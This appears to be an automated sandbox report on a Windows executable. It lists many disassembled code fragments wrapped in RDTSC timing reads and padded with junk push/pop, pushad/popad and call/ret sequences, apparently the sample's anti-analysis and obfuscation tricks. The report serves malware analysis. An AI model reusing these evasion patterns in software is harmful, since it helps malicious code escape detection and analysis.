Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B63C8A second address: B63C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64A4E second address: B64AB0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8B2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007FC22CC1B8B8h 0x00000011 nop 0x00000012 movsx ebx, ax 0x00000015 push 00000000h 0x00000017 mov ebx, 1AE51155h 0x0000001c push 00000000h 0x0000001e call 00007FC22CC1B8B8h 0x00000023 mov dword ptr [ebp+12465916h], ebx 0x00000029 pop ebx 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64AB0 second address: B64AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64AB4 second address: B64ABE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64ABE second address: B64AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B65D02 second address: B65D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B65D07 second address: B65D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B67BD9 second address: B67BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D3F second address: B68D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D45 second address: B68D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D49 second address: B68DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2593h], esi 0x00000011 push 00000000h 0x00000013 sub dword ptr [ebp+122D37FAh], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FC22D01ECC8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov bx, 2D10h 0x00000039 xchg eax, esi 0x0000003a jmp 00007FC22D01ECD8h 0x0000003f push eax 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B69F03 second address: B69F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC22CC1B8AAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FAE second address: B68FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FB4 second address: B68FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22CC1B8ACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FCB second address: B68FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FCF second address: B68FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF57 second address: B6AF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF5D second address: B6AF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF61 second address: B6AFCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+122D2008h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC22D01ECC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d pushad 0x0000002e js 00007FC22D01ECC8h 0x00000034 mov bl, A4h 0x00000036 mov dword ptr [ebp+122D27BAh], eax 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FC22D01ECC8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AFCA second address: B6AFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6C105 second address: B6C176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC22D01ECC8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jnc 00007FC22D01ECD4h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FC22D01ECC8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000000h 0x00000033 mov edi, 49C10FD6h 0x00000038 push 00000000h 0x0000003a call 00007FC22D01ECD5h 0x0000003f mov dword ptr [ebp+122D1F5Dh], edi 0x00000045 pop ebx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a ja 00007FC22D01ECC6h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6C176 second address: B6C1A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC22CC1B8A8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 js 00007FC22CC1B8D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC22CC1B8B4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6D12F second address: B6D17A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c movsx edi, dx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FC22D01ECC8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b add dword ptr [ebp+122DBBADh], esi 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 mov di, 1C52h 0x00000038 mov dx, di 0x0000003b popad 0x0000003c push eax 0x0000003d jnp 00007FC22D01ECD0h 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E1FA second address: B6E1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E1FE second address: B6E259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC22D01ECCFh 0x0000000e popad 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D295Bh], eax 0x00000016 push 00000000h 0x00000018 xor bx, CA00h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FC22D01ECC8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 sub dword ptr [ebp+122DBB93h], ecx 0x0000003f xchg eax, esi 0x00000040 push edi 0x00000041 push eax 0x00000042 push edx 0x00000043 jng 00007FC22D01ECC6h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E407 second address: B6E429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC22CC1B8B1h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E429 second address: B6E491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub dword ptr [ebp+124579F1h], edi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 pushad 0x00000015 jmp 00007FC22D01ECD3h 0x0000001a jne 00007FC22D01ECCCh 0x00000020 popad 0x00000021 and bx, A100h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov dword ptr [ebp+122D25A2h], eax 0x00000033 mov eax, dword ptr [ebp+122D1245h] 0x00000039 sub dword ptr [ebp+122D38FCh], ecx 0x0000003f push FFFFFFFFh 0x00000041 jmp 00007FC22D01ECCCh 0x00000046 mov ebx, esi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7039B second address: B703A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B703A5 second address: B70413 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D2EBBh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c pushad 0x0000001d movzx eax, dx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FC22D01ECC8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov ebx, ecx 0x00000047 jp 00007FC22D01ECCBh 0x0000004d sub bx, F935h 0x00000052 mov eax, dword ptr [ebp+122D0009h] 0x00000058 mov dword ptr [ebp+122D2135h], edi 0x0000005e push FFFFFFFFh 0x00000060 add bx, 9145h 0x00000065 nop 0x00000066 pushad 0x00000067 push edi 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B70413 second address: B70435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FC22CC1B8A8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC22CC1B8B1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B721B7 second address: B721BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B16254 second address: B1625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1625A second address: B16282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007FC22D01ECDCh 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC22D01ECD4h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7A6CA second address: B7A6D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7A6D8 second address: B7A6DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D6DB second address: B7D726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007FC22CC1B8B3h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FC22CC1B8B2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC22CC1B8B3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D726 second address: B7D72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D868 second address: B7D87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FC22CC1B8AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA5B second address: B7DA72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22D01ECCCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA72 second address: B7DA7C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22CC1B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA7C second address: B7DA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DBBE second address: B7DBC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DBC2 second address: B7DBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802B0 second address: B802B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802B4 second address: B802BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802BD second address: B802C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B11231 second address: B11242 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC22D01ECCCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8369F second address: B836A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B836A5 second address: B836A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B836A9 second address: B836DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 je 00007FC22CC1B8A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC22CC1B8B2h 0x00000016 jno 00007FC22CC1B8A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B83E7A second address: B83EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push ebx 0x0000000f jmp 00007FC22D01ECD9h 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B83FA5 second address: B84021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B8h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC22CC1B8B9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007FC22CC1B8ABh 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push esi 0x00000025 jmp 00007FC22CC1B8B7h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007FC22CC1B8ACh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87618 second address: B8762A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FC22D01ECCCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8762A second address: B87643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B4h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87643 second address: B87650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87650 second address: B87656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87656 second address: B8765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8765A second address: B87681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC22CC1B8BFh 0x0000000e jmp 00007FC22CC1B8B7h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BD09 second address: B8BD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BD0D second address: B8BD13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BFF2 second address: B8C00C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jg 00007FC22D01ECC6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C00C second address: B8C036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FC22CC1B8A6h 0x00000011 jmp 00007FC22CC1B8B9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C036 second address: B8C03F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C03F second address: B8C045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C045 second address: B8C052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FC22D01ECCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1B7 second address: B8C1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1BC second address: B8C1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1C2 second address: B8C1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C65F second address: B8C663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C937 second address: B8C955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC22CC1B8B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C955 second address: B8C95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C95B second address: B8C960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B92BF7 second address: B92BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B92BFD second address: B92C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97075 second address: B9709A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC22D01ECD2h 0x0000000f rdtsc
